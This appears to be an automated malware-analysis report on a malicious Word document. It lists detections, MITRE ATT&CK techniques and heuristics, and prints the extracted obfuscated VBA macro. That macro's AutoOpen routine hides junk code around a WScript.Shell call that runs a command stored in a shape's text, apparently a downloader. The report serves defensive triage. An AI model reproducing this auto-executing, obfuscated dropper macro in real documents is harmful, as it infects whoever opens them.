MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains VBA macros with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The script attempts to execute cmd.exe with a complex command string that appears to download and execute a payload. The presence of the 'GetObject' call and the suspicious cmd.exe invocation strongly suggest a downloader or dropper functionality.
Heuristics 9
-
ClamAV: Doc.Malware.Sagent-6775364-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6775364-0
-
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set ORjTjR = GetObject(GzpszZkc + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + czifQk) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7992 bytes |
SHA-256: d849481b2db041b108a7f12a381858362c19e4c52564b1e40cfaa0aa5d4984f9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
147 of 210 identifiers look randomly generated (e.g. 'nBlAafUYtFNksb') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DsrfknT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case mnobj
Case 99634501
TkDdMNWm = 237920903
wzVcDTj = CLng(213162768)
Case 129138161
LQvblG = Oct(kdEXRz)
zimMoLjcw = iRBZiUHuQ
Case 311173347
DobrFwm = CDate(fCfza)
ZhUrIji = Int(118016430 * tUEpB)
End Select
On Error Resume Next
Select Case TzcTHk
Case 315084786
KomJDYK = 107339867
lTcjbdw = CLng(90255384)
Case 120538012
UiiEzzb = Oct(rEWwVk)
JwDtptp = izdwisTiF
Case 271089319
atckm = CDate(bDTMIo)
sKRivUcjf = Int(243678887 * HWAzb)
End Select
On Error Resume Next
Select Case DZwrv
Case 196020347
jqiur = 92405127
FlBUjN = CLng(179950876)
Case 310690956
bvVkqYFz = Oct(dmFCiYQAc)
vMlsVR = ibSfjhIr
Case 149477157
atJKlhwNb = CDate(CGdEil)
zVpDAT = Int(72805103 * diTzEwKHc)
End Select
Set cBEZvpKUi = Shapes("nBlAafUYtFNksb")
On Error Resume Next
Select Case tAjjiZKi
Case 8493768
ZdpiNjc = 36507019
QHIEwLIQl = CLng(80521250)
Case 294162965
iVHbBcort = Oct(IwGQGLB)
WZfsHalwi = aIYWIVq
Case 54855370
HMHnNCnz = CDate(zhFwPo)
SUqOhpEuT = Int(112393311 * Dlolazdu)
End Select
On Error Resume Next
Select Case wOSzlAh
Case 338017082
wvlpRi = 286760640
UcYczHVJk = CLng(259312940)
Case 45504713
iKZUvQJXV = Oct(tuijO)
SqGUqzX = VvzHwqAMa
Case 14199579
nWQuBYUU = CDate(jdzSts)
ujmGfnawz = Int(112178508 * bfzjU)
End Select
On Error Resume Next
Select Case ziDLRjT
Case 163088159
aPYPmtM = 161190035
mhrTXQs = CLng(202591593)
Case 160448589
kCNXiuCas = Oct(wPnRhCd)
GXjjUR = UldKmSm
Case 75789638
nTNrqV = CDate(SUzXWuZm)
nZYATD = Int(220800543 * zOIZQFHLD)
End Select
On Error Resume Next
Select Case iZFOztRtb
Case 155384954
BXdLzhiiw = 103313394
Kwwbwv = CLng(293324404)
Case 182477892
unQbcJ = Oct(OZJCwII)
PiuucUPph = PHPWuV
Case 7914306
IwNHBinFT = CDate(oNVCq)
LPBww = Int(305884333 * wiMNCLr)
End Select
On Error Resume Next
Select Case cBRUXiN
Case 18244478
tHLYjGIz = 336851193
uCBUPJbRJ = CLng(162001935)
Case 181313896
EqsbYPhd = Oct(sMTzzb)
mwpmbE = abhBLvRE
Case 198584897
NDVfFh = CDate(QVmBphVSi)
iKioF = Int(337108236 * SzrNW)
End Select
vRuwQliz = "" + mmtvWHD + iJltGljQ + FSjltM + Fqftor + cBEZvpKUi.TextFrame.TextRange.Text + vIvnniqt + YjYcX + lRAjbhFi + aRdQbTi
On Error Resume Next
Select Case irfIr
Case 113174422
bWqXcaonA = 291273927
HZcdC = CLng(55053546)
Case 269240425
DEEsbVH = Oct(HoMMTn)
worBCmw = saqrbiBp
Case 153978947
VNqWiP = CDate(UGjzn)
lUwdoKHl = Int(232572654 * ULSki)
End Select
On Error Resume Next
Select Case IwXnsBu
Case 276265436
iuLswHR = 112535912
IPnHPr = CLng(271148979)
Case 49664590
tUlpM = Oct(mKAJLOXG)
IWvXqohcw = AVqAh
Case 214587631
lzAVkpifF = CDate(GIFzkJuw)
vRQPMsmfL = Int(70518737 * JTcMcZFYY)
End Select
On Error Resume Next
Select Case aORiWrCLk
Case 154303643
ROQfpPX = 116661018
dQKiFMP = CLng(141928304)
Case 274451357
iPaHz = Oct(CJMNG)
ziucSCQnT = BfOKEmZKb
Case 214012600
hoLrHTa = CDate(FKDWnQfk)
uNFCjjO = Int(312256928 * mBPkCmZUR)
End Select
On Error Resume Next
Select Case XwASlnpv
Case 9214427
csjfKI = 311734838
BDfjLRdJ = CLng(202498129)
Case 55467208
owLfVtwSf = Oct(NDodw)
cPlcIzu = lHomip
Case 184246782
jwMUQ = CDate(KmLqPd)
AqGNsAtt = Int(211510959 * rCAtNFMj)
End Select
Set ORjTjR = GetObject(GzpszZkc + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + czifQk)
On Error Resume Next
Select Case tOqkGGR
Case 179954546
zjvHdi = 106981571
EnwPkdjf = CLng(164351472)
Case 182066855
dzkfjjK = Oct(AwzROjooK)
RhcBaMK = MIkJF
Case 222884707
owPODMbT = CDate(PoFWjiwoW)
HtAbZ = Int(161244399 * jTBFrt)
End Select
On Error Resume Next
Select Case qpJDtr
Case 3008510
LjjWkiwv = 91512490
TDHdojXGI = CLng(39859697)
Case 145803289
CYCKRciU = Oct(wkWoo)
tIiiWaz = dKMBcjniu
Case 107486235
jKUZRUQ = CDate(oXTkoABdz)
XzHFbZz = Int(30561372 * CnONpGM)
End Select
Const OCEFBMmAM = 0
On Error Resume Next
Select Case WDLjoj
Case 251425082
BVfPJQpPu = 242476986
KwPASJhz = CLng(330045819)
Case 208174575
dVnzEwWz = Oct(wjhqZ)
INwwqjMs = RGDsX
Case 44630363
oMQsJcLL = CDate(tudiiRYbf)
UACoB = Int(110444058 * ljwtdbA)
End Select
On Error Resume Next
Select Case ABtjuDYk
Case 73613812
VYRsCU = 293547657
vhIifw = CLng(127901700)
Case 130811889
oEpPBOda = Oct(kENridjrR)
RiwKCWvo = VVvQaOk
Case 209440923
zUKnSDk = CDate(AEwiuojn)
Hptnt = Int(39176888 * CEdoomd)
End Select
On Error Resume Next
Select Case YFSpqhkd
Case 54048414
VsbhQ = 218865451
vIswaAOXv = CLng(194654538)
Case 230608925
BjTlVCEK = Oct(lLzbGDnA)
PkhdlRjmz = ESvDB
Case 322893282
YCGGi = CDate(WGKzvW)
waWwNw = Int(336106278 * vBCiFzF)
End Select
On Error Resume Next
Select Case Sbrbbq
Case 115917686
jQAlqTLOt = 254577422
doXJq = CLng(273114500)
Case 119243899
NiJiJSoFz = Oct(pIiYGM)
QDmmQ = uONEav
Case 123187344
mJwEO = CDate(hrSBONu)
icEiL = Int(35175332 * mfHwTOU)
End Select
ORjTjR.Run@ vRuwQliz, OCEFBMmAM
On Error Resume Next
Select Case GzLFzpY
Case 178082663
iVFpk = 24603725
hKDVXnjB = CLng(296693901)
Case 83287702
zwjwOPp = Oct(wnoFitlt)
rcddd = kFAsHSRJ
Case 84740810
NaiXjGpA = CDate(FwtFZ)
ltWKQiw = Int(131734771 * wtOXhN)
End Select
On Error Resume Next
Select Case YvjFt
Case 258147241
Momii = 124330416
Ltuks = CLng(138224285)
Case 71914715
AQYORHrB = Oct(aUwqLhVwF)
GBknnS = zldMj
Case 50957627
pvPjiVzVn = CDate(EKWKALYn)
JEhPclwJ = Int(63245657 * YktMC)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.